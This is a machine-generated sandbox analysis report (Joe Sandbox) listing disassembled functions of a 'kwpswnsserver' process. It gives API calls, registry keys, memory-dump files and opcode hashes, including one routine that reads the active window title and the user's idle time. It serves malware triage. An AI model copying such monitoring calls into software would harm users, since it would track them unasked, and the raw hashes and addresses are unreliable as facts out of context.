                                                                  • Opcode ID: a0ac149bbd708247a34d0875e0fc0d7d64f8564a2e7273a7db19b743e046b265
                                                                  • Instruction ID: 8a2f92492a63d80e72949733354578b3d73ae9f7454fcb8b926ebc3c6bdf64d6
                                                                  • Opcode Fuzzy Hash: a0ac149bbd708247a34d0875e0fc0d7d64f8564a2e7273a7db19b743e046b265
                                                                  • Instruction Fuzzy Hash: 1B5173B1F20215AFDB04DFA4D884AEEB7B8EF48354F048119E906A7250E734BD45CBA5
                                                                  Function 6C8A529D Relevance: 15.1, APIs: 10, Instructions: 124memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C8947D0,?,6C889345,?,6C893C90), ref: 6C8A52AE
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,?,?,?,?,6C8947D0,?,6C889345,?,6C893C90), ref: 6C8A5320
                                                                  • GlobalHandle.KERNEL32(6C851B41), ref: 6C8A532A
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C8A533C
                                                                  • GlobalReAlloc.KERNEL32(?,00000000), ref: 6C8A5357
                                                                  • GlobalLock.KERNEL32(00000000), ref: 6C8A5362
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8A53AF
                                                                  • GlobalHandle.KERNEL32(6C851B41), ref: 6C8A53C3
                                                                  • GlobalLock.KERNEL32(00000000), ref: 6C8A53CE
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8947D0,?,6C889345,?,6C893C90,E343E0B4), ref: 6C8A53DD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                  • String ID:
                                                                  • API String ID: 2667261700-0
                                                                  • Opcode ID: c668e3aa1a1e423380e270d26b07c6f64e77173940060447f020bed7517f4214
                                                                  • Instruction ID: 5ad1ee6cf21cf89f56f5cebe4535b00248587736841cbc0b7b229bc83d87ced0
                                                                  • Opcode Fuzzy Hash: c668e3aa1a1e423380e270d26b07c6f64e77173940060447f020bed7517f4214
                                                                  • Instruction Fuzzy Hash: 9041E17160171AEFDB249FE8CD48B49B7B8FF42308F118969E815D3940DBB0E992CB90
                                                                  Function 004A4D40 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 136registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\kingsoft\Office\6.0\Common,00000000,00020019,?,?,?,00000000), ref: 004A4D9A
                                                                  • RegQueryValueExW.ADVAPI32(?,InstallRoot,00000000,00000000,?,00000200,?,?,00000000), ref: 004A4DC1
                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004A4DD1
                                                                  • RegOpenKeyExW.KERNEL32(80000002,Software\kingsoft\Office\6.0\Common,00000000,00020019,?,?,?,00000000), ref: 004A4DEF
                                                                  • RegQueryValueExW.ADVAPI32(?,InstallRoot,00000000,00000000,?,00000200,?,?,00000000), ref: 004A4E16
                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004A4E40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3558864422.00000000004A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004A0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3558823117.00000000004A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559020450.00000000004E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559071612.00000000004E4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559112097.00000000004E6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559153425.00000000004E8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4a0000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: InstallRoot$Software\kingsoft\Office\6.0\Common
                                                                  • API String ID: 3677997916-3188658269
                                                                  • Opcode ID: 6f01c0ecffc839251a24aba0d269bcce399fbd9b51a4170eced81dd7366d84bc
                                                                  • Instruction ID: ae2cee742d7f6a8bcdc7ee8d3846c2190831b3d2a2acdbbf839c705147886f43
                                                                  • Opcode Fuzzy Hash: 6f01c0ecffc839251a24aba0d269bcce399fbd9b51a4170eced81dd7366d84bc
                                                                  • Instruction Fuzzy Hash: BA41E570600318ABDB209F24DC49BEFB7B4FF54704F1046AEE919D6691E7B86A808F58
                                                                  Function 6C8795B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeof
                                                                  • String ID: $$AFX_DIALOG_LAYOUT$CONFIG
                                                                  • API String ID: 1601749889-1968922069
                                                                  • Opcode ID: f308bd94d08a6a5fe4aca15f7456a7a7941cd4dd964d2d39b4de3e71452bce2d
                                                                  • Instruction ID: 5131f11b0a4d0ba732b9e90b5e8a21c985c180e99ceba4fd495bf972dae6cc0d
                                                                  • Opcode Fuzzy Hash: f308bd94d08a6a5fe4aca15f7456a7a7941cd4dd964d2d39b4de3e71452bce2d
                                                                  • Instruction Fuzzy Hash: 8F516CB4E05308DFCB24EFA8D58469DBBF0BF49344F10892AE858E7710E734A945CB12
                                                                  Function 6C9E8C2E Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C9E9033: CreateFileW.KERNEL32(6C86A690,00000000,?,6C9E8CD7,?,?,00000000,?,6C9E8CD7,6C86A690,0000000C), ref: 6C9E9050
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E8D42
                                                                  • __dosmaperr.LIBCMT ref: 6C9E8D49
                                                                  • GetFileType.KERNEL32(00000000), ref: 6C9E8D55
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E8D5F
                                                                  • __dosmaperr.LIBCMT ref: 6C9E8D68
                                                                  • CloseHandle.KERNEL32(00000000), ref: 6C9E8D88
                                                                  • CloseHandle.KERNEL32(6C9DFD2C), ref: 6C9E8ED5
                                                                  • GetLastError.KERNEL32 ref: 6C9E8F07
                                                                  • __dosmaperr.LIBCMT ref: 6C9E8F0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                  • String ID:
                                                                  • API String ID: 4237864984-0
                                                                  • Opcode ID: 3fb5367f33147d6ba39c3b93b311b188d908cb88660eeb6c3c125c934ba606ed
                                                                  • Instruction ID: 863a9c4f1e4f972b48266b74c9525e102c579b8d535db9d0be4b0284bd6f5f2d
                                                                  • Opcode Fuzzy Hash: 3fb5367f33147d6ba39c3b93b311b188d908cb88660eeb6c3c125c934ba606ed
                                                                  • Instruction Fuzzy Hash: C1A10332A041559FCF0E9FACCC91BAD3BB5AF2B318F14425AE815AB391C735C816CB55
                                                                  Function 0427CA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,042912F8,5EF26BF0,00000001,00000000,00000000), ref: 0427CAB1
                                                                  • RegQueryInfoKeyW.ADVAPI32(042912F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0427CAE0
                                                                  • _memset.LIBCMT ref: 0427CB44
                                                                  • _memset.LIBCMT ref: 0427CB53
                                                                  • RegEnumValueW.KERNEL32(042912F8,?,00000000,?,00000000,?,00000000,?), ref: 0427CB72
                                                                    • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
                                                                    • Part of subcall function 0427F707: std::exception::exception.LIBCMT ref: 0427F756
                                                                    • Part of subcall function 0427F707: std::exception::exception.LIBCMT ref: 0427F770
                                                                    • Part of subcall function 0427F707: __CxxThrowException@8.LIBCMT ref: 0427F781
                                                                  • RegCloseKey.KERNEL32(042912F8,?,?,?,?,?,?,?,?,?,?,?,00000000,042912F8,000000FF), ref: 0427CC83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                  • String ID: Console\0
                                                                  • API String ID: 1348767993-1253790388
                                                                  • Opcode ID: abf4ba3aa717cd31a7553d965e72f9dc95bc39b3c683173bc77dab509eede0ef
                                                                  • Instruction ID: bb4ef9cd77c49baf0ba9717785420d284aab5f6c510caa514da554b79368140b
                                                                  • Opcode Fuzzy Hash: abf4ba3aa717cd31a7553d965e72f9dc95bc39b3c683173bc77dab509eede0ef
                                                                  • Instruction Fuzzy Hash: 78612CB1E11219AFDB04DFA9D880EAEB7B8FF48314F14456AE915E7341DB74AD01CBA0
                                                                  Function 0427BB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
                                                                  • _memset.LIBCMT ref: 0427BB21
                                                                  • GetLastInputInfo.USER32(?), ref: 0427BB37
                                                                  • GetTickCount.KERNEL32 ref: 0427BB3D
                                                                  • wsprintfW.USER32 ref: 0427BB66
                                                                  • GetForegroundWindow.USER32 ref: 0427BB6F
                                                                  • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0427BB83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                  • String ID: %d min
                                                                  • API String ID: 3754759880-1947832151
                                                                  • Opcode ID: 545308f608a4da5eb9b8ff70a16934b2390bdc550f4f9d1b6b1169931f8a7eee
                                                                  • Instruction ID: 2e9e4c741f2f6d4641b2f41c8ec5c163f772b694d71eb835e64a63627794cf72
                                                                  • Opcode Fuzzy Hash: 545308f608a4da5eb9b8ff70a16934b2390bdc550f4f9d1b6b1169931f8a7eee
                                                                  • Instruction Fuzzy Hash: 7B41A3B5E10114AFDB10DFA8D889E9FBFB8EF44704F148568E9099B241DA74BE04CBE1
                                                                  Function 04276910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(5EF26BF0,00000000,00000000,75BF73E0,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276938
                                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276947
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276960
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 0427696B
                                                                  • SysStringLen.OLEAUT32(00000000), ref: 042769BE
                                                                  • SysStringLen.OLEAUT32(00000000), ref: 042769CC
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,042910DB,000000FF), ref: 04276A2E
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,042910DB,000000FF), ref: 04276A34
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                  • String ID:
                                                                  • API String ID: 429299433-0
                                                                  • Opcode ID: 188b23bdc3c73092b179bb59cc99c511ecff6069f754fee8a47b99ff86d12aff
                                                                  • Instruction ID: b36b9877b5bd5505c4c8593b514f9b342391cf0cb7bb300b4e264d4b41da2caf
                                                                  • Opcode Fuzzy Hash: 188b23bdc3c73092b179bb59cc99c511ecff6069f754fee8a47b99ff86d12aff
                                                                  • Instruction Fuzzy Hash: 7D41C4B2F10619EBDB10DFA9DC44AAEF7B8EB44314F104A6AD915E7241EB757D00CBA0
                                                                  Function 6C87A6A7 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 203threadsynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C87A1B0: GetModuleFileNameA.KERNEL32 ref: 6C87A20C
                                                                  • CreateThread.KERNEL32 ref: 6C87A82D
                                                                  • CreateThread.KERNEL32 ref: 6C87A869
                                                                  • WaitForSingleObject.KERNEL32 ref: 6C87A896
                                                                    • Part of subcall function 6C87A390: GetModuleFileNameA.KERNEL32 ref: 6C87A3EC
                                                                    • Part of subcall function 6C8720A0: GetModuleFileNameA.KERNEL32 ref: 6C8720D3
                                                                    • Part of subcall function 6C87A570: GetModuleHandleA.KERNEL32 ref: 6C87A5A2
                                                                    • Part of subcall function 6C8795B0: GetModuleHandleA.KERNEL32 ref: 6C8795BF
                                                                    • Part of subcall function 6C8795B0: FindResourceW.KERNEL32 ref: 6C87961E
                                                                    • Part of subcall function 6C8795B0: LoadResource.KERNEL32 ref: 6C879653
                                                                    • Part of subcall function 6C8795B0: SizeofResource.KERNEL32 ref: 6C87966C
                                                                    • Part of subcall function 6C8795B0: LockResource.KERNEL32 ref: 6C87967E
                                                                  • CreateThread.KERNEL32 ref: 6C87AA0A
                                                                    • Part of subcall function 6C8780B0: WSAStartup.WS2_32 ref: 6C878109
                                                                    • Part of subcall function 6C8780B0: getaddrinfo.WS2_32 ref: 6C878226
                                                                    • Part of subcall function 6C8780B0: WSACleanup.WS2_32 ref: 6C87823F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Module$Resource$CreateFileNameThread$Handle$CleanupFindLoadLockObjectSingleSizeofStartupWaitgetaddrinfo
                                                                  • String ID: IiVi$S
                                                                  • API String ID: 815238310-2807934466
                                                                  • Opcode ID: 8b348b293f831965402e5c787604d44236d6ad7cf9654ec6c728d7e18f185ae0
                                                                  • Instruction ID: fe04ddf1d9bbc0e16ee1fce2a7ccd3acfdea7a9971f7f97a148b4f7b8a69e252
                                                                  • Opcode Fuzzy Hash: 8b348b293f831965402e5c787604d44236d6ad7cf9654ec6c728d7e18f185ae0
                                                                  • Instruction Fuzzy Hash: 38916EB0904218CFD724EF28DA547DDB7B0FF15308F0188AAD4499B790EB759A48CFA2
                                                                  Function 004A5A30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 124registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004A5CD0: std::locale::_Init.LIBCPMT ref: 004A5E00
                                                                    • Part of subcall function 004A5CD0: std::locale::_Init.LIBCPMT ref: 004A5EA8
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\kingsoft\Office\6.0\plugins\messagepushcenter\wns,00000000,00020019,?,EED03960,?,?), ref: 004A5A94
                                                                  • RegQueryValueExW.ADVAPI32(?,log,00000000,?,?,?), ref: 004A5ABF
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004A5AD9
                                                                  Strings
                                                                  • Software\kingsoft\Office\6.0\plugins\messagepushcenter\wns, xrefs: 004A5A8A
                                                                  • log, xrefs: 004A5AB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3558864422.00000000004A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004A0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3558823117.00000000004A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559020450.00000000004E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559071612.00000000004E4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559112097.00000000004E6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559153425.00000000004E8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4a0000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Initstd::locale::_$CloseOpenQueryValue
                                                                  • String ID: Software\kingsoft\Office\6.0\plugins\messagepushcenter\wns$log
                                                                  • API String ID: 3477772553-1823910469
                                                                  • Opcode ID: b6c12b0c70623f8356431fe624e9588104de917b58cee92218402f190beb608c
                                                                  • Instruction ID: cc17f626bc1a80ab151c758b01328edb40648566d89831e7cd96898fa2ae3e30
                                                                  • Opcode Fuzzy Hash: b6c12b0c70623f8356431fe624e9588104de917b58cee92218402f190beb608c
                                                                  • Instruction Fuzzy Hash: 1C51A070D00708AFEB14DF95D985BAEFBB4FF15314F10422AE814B7291DB785944CBA9
                                                                  Function 04276D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 04276DD9
                                                                  • RegOpenKeyExW.KERNEL32(80000001,04295164,00000000,00020019,75BF73E0), ref: 04276DFC
                                                                  • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 04276E4A
                                                                  • lstrcmpW.KERNEL32(?,04295148), ref: 04276E60
                                                                  • lstrcpyW.KERNEL32(042756EA,?), ref: 04276E72
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                  • String ID: GROUP
                                                                  • API String ID: 2102619503-2593425013
                                                                  • Opcode ID: ba7f2b57ad759ece09f53723de9674c93ae4d9578aca4cd21a5a77a5fdeb2342
                                                                  • Instruction ID: 8ee9b5cdabcb298c5951a87b0c5a6e99a3d2d920ef04f5ed916a5c9cb1345d7e
                                                                  • Opcode Fuzzy Hash: ba7f2b57ad759ece09f53723de9674c93ae4d9578aca4cd21a5a77a5fdeb2342
                                                                  • Instruction Fuzzy Hash: DB318871B10219BBDB20DF94DD4DF9EB7B8EB04724F100299E50997180DB78AE84CF60
                                                                  Function 0427FA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 0427FA4E
                                                                  • __calloc_crt.LIBCMT ref: 0427FA5A
                                                                  • __getptd.LIBCMT ref: 0427FA67
                                                                  • CreateThread.KERNEL32(00000000,00000000,0427F9C4,00000000,00000000,0427E003), ref: 0427FA9E
                                                                  • GetLastError.KERNEL32(?,00000000,?,?,0427E003,00000000,00000000,04275F40,00000000,00000000,00000000), ref: 0427FAA8
                                                                  • _free.LIBCMT ref: 0427FAB1
                                                                  • __dosmaperr.LIBCMT ref: 0427FABC
                                                                    • Part of subcall function 0427F91B: __getptd_noexit.LIBCMT ref: 0427F91B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 155776804-0
                                                                  • Opcode ID: e6e2a2008c2fbfc565cde75be315623df7148560aecfc5080eaa8f7e836283ad
                                                                  • Instruction ID: 74c0e83777e019d9c2c06e1c134b81c150e10b657e66ff058718d6cefacfe29b
                                                                  • Opcode Fuzzy Hash: e6e2a2008c2fbfc565cde75be315623df7148560aecfc5080eaa8f7e836283ad
                                                                  • Instruction Fuzzy Hash: 5111C23232A707BFEB11BFA9ED4099F3799DF05668712042AF91487080EB71F811CA64
                                                                  Function 04277410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04277523), ref: 0427743D
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 04277444
                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04277523), ref: 04277452
                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04277523), ref: 0427745A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 3433367815-192647395
                                                                  • Opcode ID: 8373067503778abcd286d4c81ce8e2937b53aa8a7a44699d1ab12020c5235178
                                                                  • Instruction ID: aac7d00eea4eb7a7069d39a4099f8bd70729b7107433d7a1440672d32c8805b8
                                                                  • Opcode Fuzzy Hash: 8373067503778abcd286d4c81ce8e2937b53aa8a7a44699d1ab12020c5235178
                                                                  • Instruction Fuzzy Hash: 55014F70F50209AFCF50DFF899546AEBBF5EB48300F5045A9D509E3240EA79AE50CFA1
                                                                  Function 6C900EE2 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C900EE9
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(6CA583D0,?,?,0000007C,?,6C88F718,00000001), ref: 6C8A3391
                                                                    • Part of subcall function 6C8A3360: InitializeCriticalSection.KERNEL32(00000000,?,6C88F718,00000001), ref: 6C8A33A7
                                                                    • Part of subcall function 6C8A3360: LeaveCriticalSection.KERNEL32(6CA583D0,?,6C88F718,00000001), ref: 6C8A33B5
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(00000000,?,0000007C,?,6C88F718,00000001), ref: 6C8A33C2
                                                                  • GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6C900F3C
                                                                  • GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6C900F52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
